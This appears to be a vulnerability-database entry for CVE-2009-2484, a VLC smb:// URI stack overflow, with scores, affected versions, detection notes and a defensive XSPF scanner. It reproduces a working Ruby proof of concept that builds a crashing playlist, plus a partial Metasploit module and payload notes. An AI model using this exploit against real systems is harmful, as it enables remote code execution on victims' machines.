CVE-2009-2484
Published 2009-07-16
Priority P3 · 51 · critical · CVSS 2.0 base score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Exploit: public exploit available
EPSS: 35.11% (98.2th percentile)
Stack-based buffer overflow in the Win32AddConnection function in modules/access/smb.c in VideoLAN VLC media player 0.9.9, when running on Microsoft Windows, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long smb URI in a playlist file.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | vlc | — | — |
| videolan | vlc_media_player | — | — |
Detection & IOCs (extracted from sources)
- Detect malicious .xspf playlist files containing an oversized smb:// URI; the exploit embeds the payload in the URI formatted as smb://<payload>@<host>/<share>/
- The exploit targets libvout_directx_plugin.dll with a ROP gadget (add esp,0xcc / pop ebx / pop esi / pop edi / pop ebp / ret); presence of this DLL in VLC process memory combined with smb:// URI processing is a strong indicator
- Payload space is limited to 1024 bytes and null bytes are bad characters; the smb:// URI structure places the encoded payload in the username field before the @ sign
- The vulnerability is only present in Win32 builds of VLC; Linux/macOS builds are not affected
- Affected versions are 0.9.9 through 1.0.1; the Metasploit target is specifically tuned for VLC 0.9.9 on Windows XP SP3
- The VLC web interface trigger vector requires the web interface to be enabled (disabled by default); the primary attack vector is a crafted .xspf playlist file
- The windows/meterpreter/reverse_ord_tcp payload does not work with this exploit; only windows/exec and windows/meterpreter/reverse_tcp were confirmed functional
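The first IOC above suggests scanning playlist files for smb:// locations with an oversized URI or an oversized username component. The following scanner is an added example written for this page, not code from any of the indexed sources; the length thresholds, the sample playlists and the `check_smb_uri` / `scan_xspf` names are assumptions.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Thresholds are assumptions for this example: the PoC on this page overflows with
# 58 + 4 + 1000 bytes and a legitimate share path is far shorter than that.
MAX_SMB_URI_LEN = 256
MAX_USERINFO_LEN = 64

def check_smb_uri(uri):
    """Return a reason string if an smb:// URI looks like CVE-2009-2484 bait, else None."""
    if not uri.lower().startswith("smb://"):
        return None
    if len(uri) > MAX_SMB_URI_LEN:
        return "smb URI length %d exceeds %d" % (len(uri), MAX_SMB_URI_LEN)
    try:
        netloc = urlsplit(uri).netloc
    except ValueError as exc:  # e.g. a stray '[' in the authority part
        return "malformed smb URI: %s" % exc
    # Exploit layout per the IOC above is smb://<payload>@<host>/<share>/: inspect userinfo.
    userinfo = netloc.rsplit("@", 1)[0] if "@" in netloc else ""
    if len(userinfo) > MAX_USERINFO_LEN or re.search(r"[^\x20-\x7e]", userinfo):
        return "suspicious userinfo in smb URI (%d bytes)" % len(userinfo)
    return None

def scan_xspf(xml_text):
    """Parse an XSPF playlist and return (truncated location, reason) findings."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [("<document>", "unparseable XSPF: %s" % exc)]
    findings = []
    for el in root.iter():
        # Match <location> whether or not the XSPF namespace is declared.
        if el.tag.rsplit("}", 1)[-1] != "location":
            continue
        uri = (el.text or "").strip()
        reason = check_smb_uri(uri)
        if reason:
            findings.append((uri[:40] + "...", reason))
    return findings

# Constructed samples: a normal playlist and one shaped like the PoC on this page.
BENIGN_XSPF = """<?xml version="1.0" encoding="UTF-8"?>
<playlist version="1" xmlns="http://xspf.org/ns/0/">
  <trackList><track><location>smb://media-server/videos/talk.mkv</location></track></trackList>
</playlist>"""
SUSPECT_XSPF = BENIGN_XSPF.replace("smb://media-server/videos/talk.mkv",
                                   "smb://" + "A" * 1062 + "@127.0.0.1/foo/")
```

Run `scan_xspf` over each .xspf file handled by a mail gateway or download scanner; a non-empty result is a candidate for quarantine rather than a confirmed exploit, since long share paths do occur legitimately.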
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vendor_debian | — | 9.3 | LOW | — |
GHSA
GHSA-mv28-cc94-6wvh: Stack-based buffer overflow in the Win32AddConnection function in modules/access/smb
ghsa_unreviewed · 2022-05-02 · CVE-2009-2484 · severity HIGH · CWE-119
Debian
CVE-2009-2484: vlc - Stack-based buffer overflow in the Win32AddConnection function in modules/access...
vendor_debian · 2009 · CVSS 9.3 · CRITICAL
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
No detection rules found.
Exploit-DB
VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)
exploitdb · 2010-09-20 · CVE-2009-2484
---
```ruby
##
# $Id: vlc_smb_uri.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # The module's Rank, mixin includes and the opening of initialize() were lost
  # when the page was extracted; the class header and the 'Name' key are restored
  # here from the standard Metasploit 3 module layout.
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow',
      'Description' => %q{
          This module exploits a stack-based buffer overflow in the Win32AddConnection
        function of the VideoLAN VLC media player. Versions 0.9.9 through 1.0.1 are
        reportedly affected.

          This vulnerability is only present in Win32 builds of VLC.

          This payload was found to work with the wi
```
Exploit-DB
VideoLAN VLC Media Player 0.9.9 - 'smb://' URI Stack Buffer Overflow (PoC)
exploitdb · 2009-06-29 · CVE-2009-2484
---
```ruby
#!/usr/bin/ruby
# VideoLAN VLC Media Player 0.9.9 smb:// URI Stack-based Buffer Overflow (Proof-of-Concept)
#
# Bugtraq ID: 35500
#
# The vulnerability can also be triggered via the VLC web interface (disabled by default):
# http://[vulnerable_ip]:8080/requests/status.xml?command=in_play&input=smb://............
#
# Patch:
# http://git.videolan.org/?p=vlc.git;a=commitdiff;h=e60a9038b13b5eb805a76755efc5c6d5e080180f
#
# Tested on Windows XP SP3 (fully patched), VLC player version 0.9.9 (latest).
#
# Trancer
# http://www.rec-sec.com

foo  = "A" * 58     # filler up to the overwritten saved return address (PoC layout)
bar  = "B" * 4      # 4 bytes that land on the return address; crashes at 0x42424242
baz  = "C" * 1000   # trailing filler
b00m = foo + bar + baz

# XSPF markup: the XML tags were stripped when this page was extracted and are
# restored here to the standard XSPF/VLC playlist layout. The user@host part of
# the location was replaced by "[email protected]" in the extracted page and is
# left as it appears there.
xspf = %Q|<?xml version="1.0" encoding="UTF-8"?>
<playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
  <title>Playlist</title>
  <trackList>
    <track>
      <location>smb://[email protected]/foo/#{b00m}</location>
      <extension application="http://www.videolan.org/vlc/playlist/0">
        <vlc:id>0</vlc:id>
      </extension>
    </track>
  </trackList>
</playlist>
|

# The page's excerpt ends mid-line here; the write and close are the obvious completion.
playlist = File.new("vlc_smb.xspf", "wb")
playlist.write(xspf)
playlist.close
```
Metasploit
VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow
metasploit
This module exploits a stack-based buffer overflow in the Win32AddConnection function of the VideoLAN VLC media player. Versions 0.9.9 through 1.0.1 are reportedly affected. This vulnerability is only present in Win32 builds of VLC. This payload was found to work with the windows/exec and windows/meterpreter/reverse_tcp payloads. However, the windows/meterpreter/reverse_ord_tcp was found not to work.
No writeups or analysis indexed.
References
- http://git.videolan.org/?p=vlc.git;a=commit;h=e60a9038b13b5eb805a76755efc5c6d5e080180f
- http://secunia.com/advisories/35558
- http://www.exploit-db.com/exploits/9029
- http://www.securityfocus.com/bid/35500
- http://www.vupen.com/english/advisories/2009/1714
- https://oval.cisecurity.org/repository/search/definition/oval:org.mitre.oval:def:14800